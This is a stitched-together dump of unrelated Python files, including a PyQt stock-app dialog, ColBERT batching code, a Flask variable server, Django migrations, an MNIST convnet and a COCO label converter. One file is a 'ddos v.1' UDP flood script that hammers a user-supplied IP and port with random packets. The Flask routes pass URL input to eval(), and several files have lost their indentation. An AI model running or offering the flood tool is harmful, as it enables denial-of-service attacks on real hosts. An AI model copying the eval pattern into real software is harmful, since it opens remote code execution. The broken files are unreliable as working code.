        # Live price label (starts empty).
        # NOTE(review): y=510 places it below the 505-px-tall dialog.
        self.lblRealPrice = QtWidgets.QLabel(Home)
        self.lblRealPrice.setGeometry(QtCore.QRect(190, 510, 131, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        self.lblRealPrice.setFont(font)
        self.lblRealPrice.setText("")
        self.lblRealPrice.setObjectName("lblRealPrice")
        # Button: open the stock-calculation window.
        self.btnStockCalc = QtWidgets.QPushButton(Home)
        self.btnStockCalc.setGeometry(QtCore.QRect(160, 290, 181, 61))
        font = QtGui.QFont()
        font.setPointSize(10)
        self.btnStockCalc.setFont(font)
        self.btnStockCalc.setObjectName("btnStockCalc")
        # Button: open the stock-search window.
        self.btnStockSearch = QtWidgets.QPushButton(Home)
        self.btnStockSearch.setGeometry(QtCore.QRect(160, 210, 181, 61))
        font = QtGui.QFont()
        font.setPointSize(10)
        self.btnStockSearch.setFont(font)
        self.btnStockSearch.setObjectName("btnStockSearch")
        # Button: open the stock-data entry window.
        self.btnStockInsert = QtWidgets.QPushButton(Home)
        self.btnStockInsert.setGeometry(QtCore.QRect(160, 130, 181, 61))
        font = QtGui.QFont()
        font.setPointSize(10)
        self.btnStockInsert.setFont(font)
        self.btnStockInsert.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
        self.btnStockInsert.setObjectName("btnStockInsert")
        # Flat logout button in the bottom-left corner.
        self.btnLogout = QtWidgets.QPushButton(Home)
        self.btnLogout.setGeometry(QtCore.QRect(10, 470, 75, 23))
        self.btnLogout.setCheckable(False)
        self.btnLogout.setAutoRepeat(False)
        self.btnLogout.setAutoExclusive(False)
        self.btnLogout.setDefault(False)
        self.btnLogout.setFlat(True)
        self.btnLogout.setObjectName("btnLogout")
        # Hand-added navigation wiring.
        self.btnStockInsert.clicked.connect(self.showStockData)
        self.btnStockSearch.clicked.connect(self.showStockSearch)
        self.btnStockCalc.clicked.connect(self.showStockCalc)
        self.btnLogout.clicked.connect(self.logout)
        self.thiswindow = Home
        self.prewindow = prewindow
        self.retranslateUi(Home)
        QtCore.QMetaObject.connectSlotsByName(Home)

    def logout(self):
        """Hide this dialog and return to the previous window."""
        self.thiswindow.hide()
        self.prewindow.show()

    def showStockCalc(self):
        """Open the StockCalc window and hide Home."""
        self.window = QtWidgets.QMainWindow()
        self.ui = Ui_StockCalc()
        self.ui.setupUi(self.window)
        self.thiswindow.hide()
        self.window.show()

    def showStockSearch(self):
        """Open the StockSearching window and hide Home."""
        self.window = QtWidgets.QMainWindow()
        self.ui = Ui_StockSearching()
        self.ui.setupUi(self.window)
        self.thiswindow.hide()
        self.window.show()

    def showStockData(self):
        """Open the StockData window (passing Home so it can navigate back)."""
        self.window = QtWidgets.QMainWindow()
        self.ui = Ui_StockData()
        self.ui.setupUi(self.window,self.thiswindow)
        self.thiswindow.hide()
        self.window.show()

    def retranslateUi(self, Home):
        """Apply the (Thai) captions to the widgets."""
        _translate = QtCore.QCoreApplication.translate
        Home.setWindowTitle(_translate("Home", "Dialog"))
        self.btnStockCalc.setText(_translate("Home", "คำนวณรายการออมหุ้น"))
        self.btnStockSearch.setText(_translate("Home", "ค้นหารายชื่อหุ้นที่ทำรายการ"))
        self.btnStockInsert.setText(_translate("Home", "เพิ่มรายการหุ้นจดทะเบียน"))
        self.btnLogout.setText(_translate("Home", "Logout"))
if __name__ == "__main__":
    # Manual smoke test: show the Home dialog stand-alone.
    import sys
    app = QtWidgets.QApplication(sys.argv)
    Home = QtWidgets.QDialog()
    ui = Ui_Home()
    # Fix: setupUi() requires (Home, prewindow, user); the original call
    # passed only Home and raised TypeError. None placeholders let the
    # dialog be previewed (logout will not work without a real prewindow).
    ui.setupUi(Home, None, None)
    Home.show()
    sys.exit(app.exec_())
|
"""
Code taken from ColBERT (new_api branch), which is distributed under Apache-compatible MIT license.
https://github.com/stanford-futuredata/ColBERT/tree/new_api/colbert
"""
import torch
def tensorize_triples(query_tokenizer, doc_tokenizer, queries, passages, scores, bsize, nway):
    """Tokenize queries/passages and split them into aligned training batches.

    Returns a list of (query_batch, doc_batch, score_batch) triples: each
    query batch holds `bsize` queries, each doc/score batch `bsize * nway`
    entries. When no scores are given, empty score batches are emitted.
    """
    # assert len(passages) == len(scores) == bsize * nway
    # assert bsize is None or len(queries) % bsize == 0
    query_ids, query_mask = query_tokenizer.tensorize(queries)
    doc_ids, doc_mask = doc_tokenizer.tensorize(passages)

    query_batches = _split_into_batches(query_ids, query_mask, bsize)
    doc_batches = _split_into_batches(doc_ids, doc_mask, bsize * nway)

    if len(scores):
        score_batches = _split_into_batches2(scores, bsize * nway)
    else:
        score_batches = [[] for _ in doc_batches]

    # zip truncates to the shortest sequence, matching the original loop.
    return list(zip(query_batches, doc_batches, score_batches))
def _sort_by_length(ids, mask, bsize):
if ids.size(0) <= bsize:
return ids, mask, torch.arange(ids.size(0))
indices = mask.sum(-1).sort().indices
reverse_indices = indices.sort().indices
return ids[indices], mask[indices], reverse_indices
def _split_into_batches(ids, mask, bsize):
batches = []
for offset in range(0, ids.size(0), bsize):
batches.append((ids[offset:offset+bsize], mask[offset:offset+bsize]))
return batches
def _split_into_batches2(scores, bsize):
batches = []
for offset in range(0, len(scores), bsize):
batches.append(scores[offset:offset+bsize])
return batches
|
from flask import Flask
import json
import os, subprocess, sys, time
from automation.epson import Frame
# NOTE(review): DEBUG_MODE is not referenced anywhere in this file's
# visible code — confirm it is still needed.
DEBUG_MODE = True
# The single shared Frame instance served by every route below.
_current_frame = Frame.Frame()
# Handle of the subprocess started by start_server(); None until then.
server = None
def create_app():
    """Build the Flask app exposing the shared Frame over simple routes.

    Fixes over the original:
      * /add_variable used `{key}/{value}` placeholders, which Flask treats
        as literal path text; converted to `<key>/<value>` URL converters.
      * error paths return str(e) — a raw exception object is not a valid
        Flask response.
      * the /update_variables error message mixed `{k}`/`{v}` named fields
        with positional format() args (KeyError at runtime, and k/v could
        be unbound if eval failed); the message is now built safely.
    """
    app = Flask("automation.epson")

    @app.route("/")
    def root():
        global _current_frame
        return str(_current_frame)

    @app.route("/view")
    def route_current_frame():
        global _current_frame
        try:
            _current_frame
        except NameError:
            return "ERROR - Current Frame not initialized"
        else:
            # html = [_current_frame.pretty_str(), ]
            return _current_frame.pretty_str()

    @app.route("/add_variable/<key>/<value>")
    def add_variable(key, value):
        global _current_frame
        try:
            _current_frame[key] = value
            _current_frame.save_to_json()
            return "ok"
        except Exception as e:
            return str(e)

    @app.route("/update_variable/<key>/<value>")
    def update_variable(key, value):
        global _current_frame
        try:
            if isinstance(value, str):
                # HACK: string-to-type conversion via eval — dangerous on
                # untrusted input; kept for compatibility with callers.
                value = eval(value)
            msg = _current_frame.__setitem__(key, value, update=True)
            _current_frame.save_to_json()
            return "ok:\t" + msg
        except Exception as e:
            return str(e)

    @app.route("/update_variables/<variables_dict>")
    def update_dict(variables_dict):
        try:
            variables_dict = eval(variables_dict)  # HACK: see eval note above
            for k, v in variables_dict.items():
                update_variable(k, v)
            return "ok"
        except Exception as e:
            return "Error during dictionary upload: {}".format(e)

    @app.route("/delete_variable/<key>")
    def delete_variable(key):
        global _current_frame
        try:
            del _current_frame[key]
            _current_frame.save_to_json()
            return _current_frame.comm_str()
        except Exception as e:
            return str(e)

    @app.route("/keys")
    def get_keys():
        global _current_frame
        return ",".join(_current_frame._keys())

    return app
def start_server():
    """Launch the Flask dev server for this module in a child process."""
    global server
    os.environ["FLASK_APP"]="automation.epson:create_app()"
    os.environ["FLASK_ENV"]="development"
    os.environ["FLASK_DEBUG"]="1"
    # Server output is discarded (stdout -> DEVNULL, stderr folded into it).
    server = subprocess.Popen(["python","-m","flask","run"], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
    print("starting server")
    #delay to let server start up, this should be improved.....
    # Fixed 2-second dotted wait; no actual readiness check is performed.
    for i in range(10):
        sys.stdout.write(".")
        sys.stdout.flush()
        time.sleep(.2)
    print("done")
def stop_server():
    """Terminate the Flask dev server started by start_server().

    NOTE(review): raises AttributeError if start_server() was never called,
    since module-level `server` is then still None.
    """
    server.kill()
|
"""
https://leetcode.com/problems/remove-nth-node-from-end-of-list/
Given the head of a linked list, remove the nth node from the end of the list and return its head.
"""
from typing import Optional
# Definition for singly-linked list.
class ListNode:
    """A singly-linked-list node: a value plus a pointer to the next node."""

    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next
class Solution:
    def removeNthFromEnd(self, head: Optional[ListNode], n: int) -> Optional[ListNode]:
        """Delete the n-th node counted from the tail; return the new head.

        One pass with two pointers: `scout` walks to the end while `lag`
        starts moving only once `scout` is n nodes ahead, so when `scout`
        reaches the tail, `before` is the predecessor of the node to drop.
        """
        if not head:
            return None
        sentinel = ListNode(val=-1, next=head)
        before = lag = scout = sentinel
        seen = 0
        while scout.next:
            scout = scout.next
            seen += 1
            # Start dragging the lagging pointer once the gap reaches n.
            if seen >= n:
                before, lag = lag, lag.next
        # Unlink lag's node (the n-th from the end).
        before.next = before.next.next
        return sentinel.next
|
# Generated by Django 3.1.1 on 2020-10-19 14:37
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial cart-app schema: BillingAddress, Payment, OrderItem and
    Order (auto-generated by Django 3.1.1; applied migrations should not
    be hand-edited)."""

    initial = True

    dependencies = [
        # OrderItem.item references the `main` app's Item model.
        ('main', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='BillingAddress',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('street_address', models.CharField(max_length=150)),
                ('apartment_address', models.CharField(blank=True, max_length=150, null=True)),
                ('zipcode', models.CharField(blank=True, max_length=150, null=True)),
            ],
            options={
                'verbose_name': 'Address',
                'verbose_name_plural': 'Addresses',
            },
        ),
        migrations.CreateModel(
            name='Payment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('charge_id', models.CharField(max_length=150)),
                ('amount', models.FloatField()),
                # timestamp updates on every save; updated is set once on
                # creation — NOTE(review): naming looks swapped, confirm.
                ('timestamp', models.DateTimeField(auto_now=True)),
                ('updated', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'verbose_name': 'Payment',
                'verbose_name_plural': 'Payments',
            },
        ),
        migrations.CreateModel(
            name='OrderItem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('ordered', models.BooleanField(default=False)),
                ('quantity', models.IntegerField(default=1)),
                ('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.item')),
            ],
            options={
                'verbose_name': 'Order Item',
                'verbose_name_plural': 'Order Items',
            },
        ),
        migrations.CreateModel(
            name='Order',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('start_date', models.DateTimeField(auto_now_add=True)),
                ('ordered_date', models.DateTimeField()),
                ('ordered', models.BooleanField(default=False)),
                ('billing_address', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='cart.billingaddress')),
                ('items', models.ManyToManyField(to='cart.OrderItem')),
                ('payment', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='cart.payment')),
            ],
            options={
                'verbose_name': 'Order',
                'verbose_name_plural': 'Orders',
            },
        ),
    ]
|
#!/usr/bin/env python
import io_utils as io
from text_cleaner import Cleaner
import config_text_cleaner as conf
def test_stopwords_removal():
    """Clean the stop-word fixture row by row and save the result file."""
    original_content = io.load_file_rows(conf.STOP_WORDS_TEST_INPUT_FILE)
    cleaner = Cleaner()
    pieces = []
    for row in original_content:
        print("row: {0}".format(row))
        pieces.append(cleaner.clean_text(row) + "\n")
    io.save_file("".join(pieces), conf.STOP_WORDS_TEST_OUTPUT_FILE)
def test_special_characters_removal():
    """Clean the special-character fixture row by row and save the result."""
    original_content = io.load_file_rows(conf.SPECIAL_CHARACTERS_TEST_INPUT_FILE)
    cleaner = Cleaner()
    pieces = []
    for row in original_content:
        pieces.append(cleaner.clean_text(row) + "\n")
    io.save_file("".join(pieces), conf.SPECIAL_CHARACTERS_TEST_OUTPUT_FILE)
if __name__ == '__main__':
    # Run both file-based smoke tests.
    test_stopwords_removal()
    test_special_characters_removal()
|
#!/usr/bin/env python
import os
import tika
import shutil
import time
from tika import parser
tika.TikaClientOnly = True  # never spawn a local Tika; talk to a running server
from datetime import datetime

# Ask Tika to extract inline images embedded in PDFs as well.
headers = {
    'X-Tika-PDFextractInlineImages': 'true',
}

#java -jar tika-server-1.22.jar --port 8001 #to start the server on port 8001
#'http://localhost:8001' origin server code

root = 'pdfs/'
# Only hand Tika the document types handled by this pipeline.
# (Fix: the original filter also and-ed a pointless, always-truthy
# os.path.join() call.)
supported = ('.pdf', '.docx', '.pptx', '.doc', '.html')
fs = [f for f in os.listdir(root) if str(f).endswith(supported)]

start = datetime.now()
for f in fs:
    d = os.path.join(root, f)
    # Send the document to the Tika server for text extraction.
    frt = parser.from_file(d, serverEndpoint='http://localhost:8001/rmeta/text', headers=headers)
    data = str(frt["content"])
    # Fix: the original used f[:-5] + '.txt', which chops one character too
    # many for 4-character extensions ('a.pdf' -> '.txt'); splitext is
    # correct for every supported extension.
    outfn = os.path.splitext(f)[0] + '.txt'
    with open(outfn, "w") as out:  # with-block guarantees the handle closes
        out.write(data)
    shutil.move(outfn, 'text/')
end = datetime.now()
print('done...')
print(end - start)
# urllib 和 urllib2 都是接受URL请求的相关模块,但是提供了不同的功能。两个最显著的不同如下:
# urllib 仅可以接受URL,不能创建 设置了headers 的Request 类实例;
#
# 但是 urllib 提供 urlencode 方法用来GET查询字符串的产生,而 urllib2 则没有。
# (这是 urllib 和 urllib2 经常一起使用的主要原因)
#
# 编码工作使用urllib的urlencode()函数,帮我们将key:value这样的键值对转换成"key=value"这样的字符串,
# 解码工作可以使用urllib的unquote()函数。(注意,不是urllib2.urlencode() )
import urllib.parse

# Demo: percent-encoding a query dict and decoding it back.
word = {"wd": "传智"}
print(word)
# urlencode() turns the dict into a "key=percent-encoded-value" query string
# that a web server will accept (Python 2 used urllib.urlencode(word)).
urlencode = urllib.parse.urlencode(word)
print(urlencode)
# unquote() reverses the percent-encoding back to the original text.
print(urllib.parse.unquote("wd=%E4%BC%A0%E6%99%BA"))
|
from time import time
import numpy as np
from .numlib import inv_sym_matrix
from .gaussian import (Gaussian,
GaussianFamily,
FactorGaussianFamily)
# Map of family names accepted by LFit to their implementing classes.
families = {'gaussian': GaussianFamily,
            'factor_gaussian': FactorGaussianFamily}
class LFit(object):
    """Importance-weighted likelihood fit of a variational family to a
    weighted sample; the fit happens at construction time."""

    def __init__(self, sample, family='gaussian'):
        """
        Importance weighted likelihood fitting method.

        sample: object exposing x (dim x npts array), pe, logscale and
        kernel — assumed per the usage below; TODO confirm exact contract.
        family: 'gaussian' or 'factor_gaussian' (see module-level map).
        """
        t0 = time()
        self.sample = sample
        self.dim = sample.x.shape[0]
        self.npts = sample.x.shape[1]
        # Instantiate fitting family
        if family not in families.keys():
            raise ValueError('unknown family')
        self.family = families[family](self.dim)
        # Pre-compute some stuff and cache it
        self._cache = {'F': self.family.design_matrix(sample.x)}
        # Perform fit
        self._do_fitting()
        # Wall-clock time spent on the whole fit.
        self.time = time() - t0

    def _do_fitting(self):
        # Monte-Carlo estimate of the integral of F against the target,
        # rescaled out of log space, then mapped to family parameters.
        F = self._cache['F']
        self._integral = np.dot(F, self.sample.pe) / self.npts
        self._integral *= np.exp(self.sample.logscale)
        self._fit = self.family.from_integral(self._integral)

    def _get_integral(self):
        return self._integral

    def _get_var_integral(self):
        """
        Estimate variance on integral estimate
        """
        F, pe, integral = self._cache['F'], self.sample.pe, self._integral
        n = integral.size
        var = np.dot(F * (pe ** 2), F.T) / self.npts \
            - np.dot(integral.reshape(n, 1), integral.reshape(1, n))
        var /= self.npts
        return var

    def _get_fit(self):
        return self._fit

    def _get_theta(self):
        # Fitted natural parameters, relative to the sampling kernel's.
        theta = self._fit.theta.copy()
        theta -= self.sample.kernel.theta
        return theta

    def _get_sensitivity_matrix(self):
        F = self._cache['F']
        # compute the fitted importance weights
        log_qe = np.dot(F.T, self._fit.theta) +\
            - self.sample.kernel.log(self.sample.x)
        qe = np.exp(log_qe - self.sample.logscale)
        return np.dot(F * qe, F.T) *\
            (np.exp(self.sample.logscale) / self.npts)

    def _get_var_theta(self):
        # Sandwich form: S^-1 * Var(integral) * S^-1.
        inv_sensitivity_matrix = inv_sym_matrix(self.sensitivity_matrix)
        return np.dot(np.dot(inv_sensitivity_matrix, self.var_integral),
                      inv_sensitivity_matrix)

    def _get_kl_error(self):
        # 0.5 * trace(Var(integral) * S^-1): scalar fit-error summary.
        return .5 * np.trace(np.dot(self.var_integral,
                                    inv_sym_matrix(self.sensitivity_matrix)))

    # Read-only accessors for the fitted quantities.
    theta = property(_get_theta)
    fit = property(_get_fit)
    integral = property(_get_integral)
    var_integral = property(_get_var_integral)
    var_theta = property(_get_var_theta)
    sensitivity_matrix = property(_get_sensitivity_matrix)
    kl_error = property(_get_kl_error)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from django.shortcuts import redirect
# Create your views here.
def index(request):
    """Render the landing page."""
    template = 'index.html'
    return render(request, template)
def pagamento(request):
    """Render the transparent-checkout (payment) page."""
    template = 'pagamentotransparente.html'
    return render(request, template)
def cadastroplano(request):
    """Render the plan-creation page."""
    template = 'criarplano.html'
    return render(request, template)
def assinatura(request):
    """Render the subscription page."""
    template = 'assinatura.html'
    return render(request, template)
|
"""ddos v.1"""
import os, sys, time, socket, random
#####################
ddos = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
bytes = random._urandom(5120)
#####################
os.system("clear")
os.system("\tfiglet ddos v1")
print ("\tAuthor : Pound")
print ("\tGroup : PlusX")
print ("\tVersion : 1")
print ("\tGithub : https://github.com/Pound123")
IP = raw_input("\nIP : ")
Port = input("Port : ")
attacking = 1000
while True:
ddos.sendto(bytes, (IP, Port))
attacking = attacking + 1
print ("Attacking %s Packet to %s Port:%s"%(attacking, IP, Port))
|
# n = input('Digite algo: ')
# print(n.isnumeric()) # e numerico?
# print(n.isalpha()) # e alfa?
# print(n.isalnum()) # e alfanumerico?
# print(n.isupper()) # e caixa alta?
# Faca um porgrama que leia dois numeros e realize a soma entre ele mostrando o resultado
# Faca um porgrama que leia algo pelo teclado e mostre na tela o seu tipo primitivo e todas as informacoes possiveis sobre ele
# Read two numbers and show their sum, then report string-classification
# properties (isnumeric/isupper/isalnum/isalpha) of a typed text.
n1 = float(input('Digite o primeiro numero: '))
n2 = float(input('Digite o segundo numero: '))
s = n1 + n2
# Fix: the original message contained the garbled fragment "]e igal a";
# corrected to "e igual a" (unaccented, matching the file's other strings).
print('A soma entre {} e {} e igual a {}'.format(n1, n2, s))
print('AGORA VAMOS AVALIAR AS PROPRIEDADES DO TEXTO DIGITADO')
tx = input('Digite algo: ')
print('O texto e numerico? = ', tx.isnumeric())
print('O texto e CAIXA ALTA? = ', tx.isupper())
print('O texto e alfa numerico? = ', tx.isalnum())
print('O texto e alfabetico? = ', tx.isalpha())
|
# coding: utf-8
from Data import DataStream
import random

# Python 2 script (note the print statement below): randomly blank out
# metadata fields for roughly half of the test split, simulating missing
# features, then emit the marshalled stream.
d = DataStream.parse(open("data/full/clef50_ALL_labeled_ALL").read())
dropped_fields = ['publication_types', 'mesh_terms', 'keywords', 'journal', 'references']
for row in d:
    if row.split == 'test' and random.random() < 0.5:
        for field in dropped_fields:
            row[field] = 'MISSING_FEATURE'
print d.marshall()
|
import cv2
import consts
import time
from utils import get_saved_model
import tensorflow as tf
from tensorflow import keras
import numpy as np
def sectional_density(image, draw=False, sparsity=1, w=4, h=4, weighted=False, make2D = False):
    """Sum pixel values over a grid of w x h cells of a square image.

    Cells are scanned left-to-right, top-to-bottom; within each cell only
    every `sparsity`-th row/column is sampled. With draw=True the cell
    borders are drawn onto `image`; with make2D=True the flat result is
    regrouped into rows. `weighted` is currently unused (see the
    commented-out block below).
    """
    side = len(image)
    cell_w, cell_h = w, h
    cells = [0] * ((side // cell_w) * (side // cell_h))
    total = 0
    sampled = 0
    idx = 0
    for top in range(0, side - cell_h + 1, cell_h):
        for left in range(0, side - cell_w + 1, cell_w):
            if draw:
                cv2.rectangle(image, (left, top), (left + cell_w, top + cell_h), \
                    consts.RED, consts.AREA_BOUNDARY_THICKNESS)
            for dy in range(0, cell_h, sparsity):
                for dx in range(0, cell_w, sparsity):
                    sampled += 1
                    value = image[top + dy][left + dx]
                    cells[idx] += value
                    total += value
            idx += 1
    # if weighted:
    #     for i in range(len(cells)):
    #         cells[i] = cells[i] * total
    if make2D:
        # NOTE(review): regrouping uses `w` for both dimensions, so the
        # result only matches the grid when it is square.
        cells = [cells[i:i + w] for i in [w * j for j in range(w)]]
    return cells
class NN(object):
    """Thin wrapper around a saved Keras classifier for image prediction."""

    def __init__(self, model_name):
        # Load the stored model and append a Softmax head so raw logits
        # become class probabilities.
        self.model = get_saved_model(model_name)
        self.probability_model = tf.keras.Sequential([self.model, tf.keras.layers.Softmax()])

    def predict(self, img):
        """Return the predicted class index for a BGR image.

        NOTE(review): predict_classes() was removed in newer TensorFlow —
        confirm the pinned TF version supports it.
        """
        grayscale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        scaled = cv2.resize(grayscale, (80, 80))
        batch = np.array([scaled]).astype(np.float32)
        return self.probability_model.predict_classes(batch)[0]
import os
import json
from os import listdir, getcwd
from os.path import join
# The 80 COCO object-category names; list position doubles as the YOLO
# class id written to the label files.
classes = ["person", "bicycle", "car", "motorcycle", "airplane", "bus", "train",
           "truck", "boat", "traffic light", "fire hydrant", "stop sign", "parking meter",
           "bench", "bird", "cat", "dog", "horse", "sheep", "cow", "elephant", "bear", "zebra",
           "giraffe", "backpack", "umbrella", "handbag", "tie", "suitcase", "frisbee", "skis",
           "snowboard", "sports ball", "kite", "baseball bat", "baseball glove", "skateboard",
           "surfboard", "tennis racket", "bottle", "wine glass", "cup", "fork", "knife", "spoon",
           "bowl", "banana", "apple", "sandwich", "orange", "broccoli", "carrot", "hot dog", "pizza",
           "donut", "cake", "chair", "couch", "potted plant", "bed", "dining table", "toilet", "tv",
           "laptop", "mouse", "remote", "keyboard", "cell phone", "microwave", "oven", "toaster", "sink",
           "refrigerator", "book", "clock", "vase", "scissors", "teddy bear", "hair drier", "toothbrush"]
# box form [x, y, w, h]
def convert(size, box):
    """Normalize a COCO [x, y, w, h] pixel box by the image (width, height)."""
    scale_x = 1. / size[0]
    scale_y = 1. / size[1]
    return (box[0] * scale_x, box[1] * scale_y, box[2] * scale_x, box[3] * scale_y)
def convert_annotation():
    """Convert COCO instances_train2014 annotations into YOLO .txt labels.

    Fixes over the original:
      * both the JSON source and each per-image output file are managed
        with `with` blocks, so handles are always closed;
      * category id -> name is resolved through a dict built once instead
        of a linear filter() over data['categories'] per annotation.
    """
    with open(r"C:\Users\shast\datasets\COCOtrain2014\annotations\instances_train2014.json", 'r') as f:
        data = json.load(f)

    # Resolve category ids once for the whole run.
    id_to_name = {cat['id']: cat['name'] for cat in data['categories']}

    for item in data['images']:
        image_id = item['id']
        file_name = item['file_name']
        width = item['width']
        height = item['height']
        # All annotations belonging to this image.
        value = filter(lambda item1: item1['image_id'] == image_id, data['annotations'])
        # 'a+' append mode preserved: re-runs add to existing label files.
        with open(r"C:\Users\shast\datasets\COCOtrain2014\annotations\label-txt\%s.txt" % (file_name[:-4]), 'a+') as outfile:
            for item2 in value:
                class_id = classes.index(id_to_name[item2['category_id']])
                bb = convert((width, height), item2['bbox'])
                outfile.write(str(class_id) + " " + " ".join([str(a) for a in bb]) + '\n')
if __name__ == '__main__':
    # One-shot conversion of the hard-coded COCO annotation file.
    convert_annotation()
# Generated by Django 3.0.8 on 2020-07-22 17:44
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a `title` field (default 'Unknow Title') to the note model.

    NOTE(review): the default string carries the typo "Unknow"; changing an
    applied migration would alter history, so it is only flagged here.
    """

    dependencies = [
        ('note', '0002_auto_20200720_0409'),
    ]

    operations = [
        migrations.AddField(
            model_name='note',
            name='title',
            field=models.CharField(default='Unknow Title', max_length=50),
        ),
    ]
|
import re
import Conversation
class MovieParser:
    """Incremental parser for a movie-script text file.

    NOTE(review): several inconsistencies are visible and flagged inline;
    this documentation pass preserves behavior as-is.
    """
    # A scene heading starts with INT. or EXT.
    Location_pattern = re.compile("^\s*(INT\.|EXT\.)")
    # Lookahead for a space followed by two capitals — a loose detector
    # for all-caps character-name lines.
    Name_pattern = re.compile("(?=.* [A-Z][A-Z])")
    # A blank line terminates a speech (also matches at end of file).
    End_of_speach = re.compile("^$")

    def __init__ (self, path):
        self.__file_path =path
        # NOTE(review): the handle is never closed by this class.
        self.__file = open(path, "r")
        self.__characters = set()

    # def main(self):

    def get_scene(self):
        """Scan the whole file, collecting conversations.

        NOTE(review): `speach` is assigned but never used, and the
        collected `conversation` list is never returned — confirm intent.
        """
        conversation = []
        speach = ""
        line = self.__file.readline()
        while line: # start reading script lines
            match_name = re.search(MovieParser.Name_pattern, line)
            if match_name: # if found character name
                name = line.strip()
                # NOTE(review): compares against "CUT TO:" here but against
                # "CUT TO" (no colon) in get_conversation — confirm.
                if(name != "CUT TO:"):
                    conversation.append(self.get_conversation(line))
            line = self.__file.readline()

    def get_conversation(self, line):
        """Collect consecutive speeches until a "CUT TO" line or a
        non-name line is read; returns the list of speeches."""
        conversation = []
        match_name = re.search(MovieParser.Name_pattern, line)
        while match_name:
            name = line.strip()
            if(name == "CUT TO"):
                return conversation
            self.__characters.add(name)
            conversation.append(self.get_speach())
            line = self.__file.readline()
            match_name = re.search(MovieParser.Name_pattern, line)
        print(conversation)
        return conversation

    def get_speach(self,):
        """Read lines until a blank line (or EOF) and return them joined
        as one speech string."""
        speech = ""
        line = self.__file.readline()
        match = re.search(MovieParser.End_of_speach, line)
        while not match:
            speech = speech+line
            line = self.__file.readline()
            match = re.search(MovieParser.End_of_speach, line)
        print(speech)
        return speech
# Script entry: parse the file named "movie" in the working directory.
movie = MovieParser("movie")
movie.get_scene()
|
# a) [a-zA-Z]*e$
# b) unmöglich
# c) [([Mo|Tu|We|Th|Fr|Sa|Su] - [Mo|Tu|We|Th|Fr|Sa|Su]) | [winter|summer]]? [\d?\d:\d\d [am|pm] -? ?,]+
# [([Mo|Tu|We|Th|Fr|Sa|Su] - [Mo|Tu|We|Th|Fr|Sa|Su]) | [winter|summer]]? [\d?\d:\d\d [am|pm] -? ?,]+
# - ... Mo-Fr 8:30am-4:30pm ...
# - ... winter: 6:30 pm, 7:30pm, 8:30 pm daily; summer: 8:30pm, 9:30pm, 10:30pm daily ...
# - ... 9 am - 4:30 pm ...
import re

# (The commented answers above discuss regexes for words ending in "e",
# and opening-hours formats.)
# p = re.compile('[a-zA-Z]*e$')
# Current pattern: captures the last four word characters of the string.
p = re.compile('(\w\w\w\w)$')
s=['ww', 'thte', 'WWWweeE', 'e', 'wwwwEeeEeweweweOOe']
for w in s:
    # match() anchors at the start, so only exactly-4-character words match.
    if(p.match(w)):
        print('Match: ' + w)
    else:
        print('Not matched: ' + w)
|
import tflearn
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
import tflearn.datasets.mnist as mnist
# Load in data
# Load in data
X, Y, test_x, test_y = mnist.load_data(one_hot=True)

# Reshape data for tflearn (28x28 single-channel images)
X = X.reshape([-1, 28, 28, 1])
# Reshape test data for tflearn
test_x = test_x.reshape([-1, 28, 28, 1])

# Model input layer
convnet = input_data(shape=[None,28,28,1],name='input')
# Convolute: input model, size, window, activation function (rectify linear)
convnet = conv_2d(convnet, 32, 2, activation='relu')
# Pool: net, window
convnet = max_pool_2d(convnet, 2)
# Convolute: input model, size, window, activation function (rectify linear)
convnet = conv_2d(convnet, 64, 2, activation='relu')
# Pool: net, window
convnet = max_pool_2d(convnet, 2)
# Fully Connected Layer: input, input size, activation function
convnet = fully_connected(convnet, 1024, activation='relu')
# Dropout neurons
convnet = dropout(convnet, 0.8)
# Output Layer (also a fully connected layer with different activation function)
convnet = fully_connected(convnet, 10, activation='softmax')
# Run Regression on convolution net: calculate loss
convnet = regression(convnet, optimizer='adam', learning_rate=0.01,
                     loss='categorical_crossentropy', name='targets')
# Deep Neural Network
model = tflearn.DNN(convnet)
# Train for 10 epochs, validating against the held-out test split.
model.fit({'input':X}, {'targets':Y}, n_epoch=10,
          validation_set=({'input':test_x}, {'targets':test_y}),
          snapshot_step=500, show_metric=True, run_id='mnist')

# Saves weights values NOT model
model.save('tflearn_conv.model')

"""
Loading weights from previous run
model.load('tflearn_conv.model')
"""

# Get Prediction
print(model.predict([test_x[1]]))
import numpy as np
class AtomPair:
    """A named pair of atoms whose inter-atomic distance is tracked.

    k and b are restraint parameters carried alongside the pair. Equality
    and hashing are symmetric: AtomPair("A", "B", ...) == AtomPair("B",
    "A", ...), and both orderings hash identically.
    """

    def __init__(self, name1, name2, selection1, selection2, k=10., b=5.):
        self.name1 = name1
        self.name2 = name2
        self.selection1 = selection1
        self.selection2 = selection2
        self.atom1 = None  # MDAnalysis Atom object, set via set_atom1()
        self.atom2 = None  # MDAnalysis Atom object, set via set_atom2()
        self.distances = list()
        self.k = k
        self.b = b
        self.pairname = "{0}-{1}".format(self.name1, self.name2)

    def set_atom1(self, atom):
        self.atom1 = atom

    def set_atom2(self, atom):
        self.atom2 = atom

    def get_distance(self):
        """Euclidean distance between the two atoms' first positions."""
        return np.linalg.norm(self.atom1.positions[0] - self.atom2.positions[0])

    def append_distances(self):
        """Record the current distance.

